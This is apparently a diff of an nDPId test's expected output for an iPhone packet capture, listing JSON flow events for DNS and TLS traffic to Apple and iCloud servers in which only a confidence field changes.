+03152{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1582454598252,"flow_last_seen":1582454598568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454598568,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","server_names":"p67-fmfmobile.icloud.com,p48-fmfmobile.icloud.com,p53-fmfmobile.icloud.com,p34-fmfmobile.icloud.com,p72-fmfmobile.icloud.com,fmfmobile.icloud.com,p08-fmfmobile.icloud.com,p12-fmfmobile.icloud.com,p02-fmfmobile.icloud.com,p29-fmfmobile.icloud.com,p52-fmfmobile.icloud.com,p26-fmfmobile.icloud.com,p06-fmfmobile.icloud.com,p97-fmfmobile.icloud.com,p41-fmfmobile.icloud.com,p40-fmfmobile.icloud.com,p18-fmfmobile.icloud.com,p55-fmfmobile.icloud.com,p70-fmfmobile.icloud.com,p32-fmfmobile.icloud.com,p69-fmfmobile.icloud.com,p17-fmfmobile.icloud.com,p13-fmfmobile.icloud.com,p38-fmfmobile.icloud.com,p11-fmfmobile.icloud.com,p21-fmfmobile.icloud.com,p27-fmfmobile.icloud.com,p42-fmfmobile.icloud.com,p37-fmfmobile.icloud.com,p56-fmfmobile.icloud.com,p50-fmfmobile.icloud.com,p58-fmfmobile.icloud.com,p39-fmfmobile.icloud.com,p45-fmfmobile.icloud.com,p49-fmfmobile.icloud.com,p68-fmfmobile.icloud.com,p10-fmfmobile.icloud.com,p22-fmfmobile.icloud.com,p07-fmfmobile.icloud.com,p25-fmfmobile.icloud.com,p20-fmfmobile.icloud.com,p71-fmfmobile.icloud.com,p05-fmfmobile.icloud.com,p98-fmfmobile.icloud.com,p66-fmfmobile.icloud.com,p15-fmfmobile.icloud.com,p16-fmfmobile.icloud.com,p44-fmfmobile.icloud.com,p04-fmfmobile.icloud.com,p09-fmfmobile.icloud.com,p23-fmfmobile.icloud.com,p61-fmfmobile.icloud.com,p30-fmfmobile.icloud.com,p46-fmfmobile.icloud.com,p60-fmfmobile.icloud.com,p43-fmfmobile.icloud.com,p57-fmfmobile.icloud.com,p14-fmfmobile.icloud.com,p03-fmfmobile.icloud.com,p36-fmfmobile.icloud.com,p64-fmfmobile.icloud.com,p28-fmfmobile.icloud.com,p24-fmfmobile.icloud.com,p202-fmfmobile.icloud.com,p01-fmfmobile.icloud.com,p62-fmfmobile.icloud.com,p47-fmfmobile.icloud.com,p35-fmfmobile.icloud.com,p65-fmfmobile.icloud.com,p31-fmfmobile.icloud.com,p63-fmfmobile.icloud.com,p19-fmfmobile.icloud.com,p33-fmfmobile.icloud.com,p51-fmfmobile.icloud.com,p54-fmfmobile.icloud.com,p59-fmfmobile.icloud.com,p201-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=fmfmobile.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:C3:9F:1A:A1:3C:D2:3C:06:96:EC:49:B4:97:A9:D3:DA:05:A3:E2"}} 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1582454598582,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1582454598582,"pkt":"xGGLNYKpxiwDYGpkCABFAADmpdwAAEARTsjAqAIBwKgCEQA1znQA0sdAsQ+BgAABAAkAAAAAB2dhdGV3YXkGaWNsb3VkA2NvbQAAAQABwAwABQABAAARlgAaB2dhdGV3YXkCZmUJYXBwbGUtZG5zA25ldADAMAABAAEAAAAiAAQR+LBLwDAAAQABAAAAIgAEEfixhcAwAAEAAQAAACIABBH4sCjAMAABAAEAAAAiAAQR+LCNwDAAAQABAAAAIgAEEfiwTcAwAAEAAQAAACIABBH4sWXAMAABAAEAAAAiAAQR+LGqwDAAAQABAAAAIgAEEfiwiQ=="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":110,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454598582,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.176.75"}} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598418,"flow_last_seen":1582454598584,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598584,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":110,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454598582,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.248.176.75"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598418,"flow_last_seen":1582454598584,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598584,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598587,"flow_last_seen":1582454598587,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598587,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1582454598587,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598587,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGtbvAqAIREfiwS8WUAbuGKOrDAAAAALDC\/\/9\/HgAAAgQFtAEDAwcBAQgKEd\/oBAAAAAAEAgAA"} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598416,"flow_last_seen":1582454598590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598590,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01251{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":130,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4123,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","server_names":"*.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ls.apple.com, OU=management:idms.group.576486, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"E4:85:25:4C:99:F8:FB:66:49:4B:80:64:5E:63:2A:75:9B:8F:C3:51"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598416,"flow_last_seen":1582454598590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598590,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01251{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":130,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598385,"flow_last_seen":1582454598592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4123,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1582454598592,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","server_names":"*.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"4ef1b297bb817d8212165a86308bac5f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ls.apple.com, OU=management:idms.group.576486, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"E4:85:25:4C:99:F8:FB:66:49:4B:80:64:5E:63:2A:75:9B:8F:C3:51"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1582454598621,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598621,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAC4GB8AR+LBLwKgCEQG7xZQAd9VghijqxKBScSDqGQAAAgQFrAEBCApbEwd4Ed\/oBAEDAwU="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAAA8BIgAAP8RMcbAqAIRwKgCAc3KADUAKGCiwekBAAABAAAAAAAAA3d3dwZpY2xvdWQDY29tAAABAAE="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABCUOgAAP8R5V\/AqAIRwKgCAfrLADUALpJfu2MBAAABAAAAAAAACmJhc2VqdW1wZXIFYXBwbGUDY29tAAABAAE="} -00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"basejumper.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"basejumper.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABB1EAAAP8RYgjAqAIRwKgCAdBFADUALQ1OiY4BAAABAAAAAAAACWlwaG9uZS1sZAVhcHBsZQNjb20AAAEAAQ=="} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"iphone-ld.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"iphone-ld.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAAA7QA4AAP8R9kDAqAIRwKgCAfQ+ADUAJzA9jewBAAABAAAAAAAAA2NsNAVhcHBsZQNjb20AAAEAAQ=="} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"cl4.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"cl4.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 